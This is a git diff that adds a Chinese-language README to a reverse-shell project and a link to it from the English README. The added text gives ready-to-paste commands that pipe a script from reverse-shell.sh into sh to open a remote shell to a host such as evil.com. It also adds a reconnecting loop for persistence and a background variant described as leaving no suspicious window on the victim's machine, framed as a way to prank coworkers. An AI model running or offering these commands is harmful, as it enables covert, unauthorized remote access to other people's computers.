diff --git a/README.md b/README.md
index 44f048d..ecca0f9 100644
--- a/README.md
+++ b/README.md
@@ -3,6 +3,8 @@
+
+ Chinese documentation[中文文档]
# reverse-shell
diff --git a/README_CN.md b/README_CN.md
new file mode 100644
index 0000000..d87fbf6
--- /dev/null
+++ b/README_CN.md
@@ -0,0 +1,93 @@
+
+
+## 小技巧
+
+### 主机名
+
+你可以使用主机名代替IP。
+
+```shell
+curl https://reverse-shell.sh/localhost:1337 | sh
+```
+
+### 远程连接
+
+因为这是一个反弹连接,所以它是可以穿透防火墙并连接到互联网。
+
+你可以在 evil.com 上侦听服务器上的连接,并通过以下命令从安全网络内部获取反向 shell:
+
+```shell
+curl https://reverse-shell.sh/evil.com:1337 | sh
+```
+
+### 重新连接(权限维持)
+
+默认情况下,当 shell 退出时,您将失去连接。您可能会意外地使用无效的命令执行此操作。您可以轻松地创建一个 shell,该 shell 将尝试通过将其包装在 while 循环中来重新连接。
+
+```shell
+while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
+```
+
+如果你对同事这样做,要小心,如果他们离开办公室时仍然在运行,你就会让他们受到攻击。
+
+### 作为后台进程运行
+
+终端会话需要保持打开状态才能保持反向 shell 连接。如果你想恶作剧同事,这可能有点暴露了。
+
+以下命令将在后台进程中运行反向 shell 并退出终端,从而在受害者的计算机上不会打开任何看起来可疑的终端窗口。
+
+确保在新的终端窗口中运行此命令,否则您将丢失现有会话中的任何工作。
+
+```shell
+sh -c "curl https://reverse-shell.sh/localhost:1337 | sh -i &" && exit
+```
+
+## License
+
+MIT © Luke Childs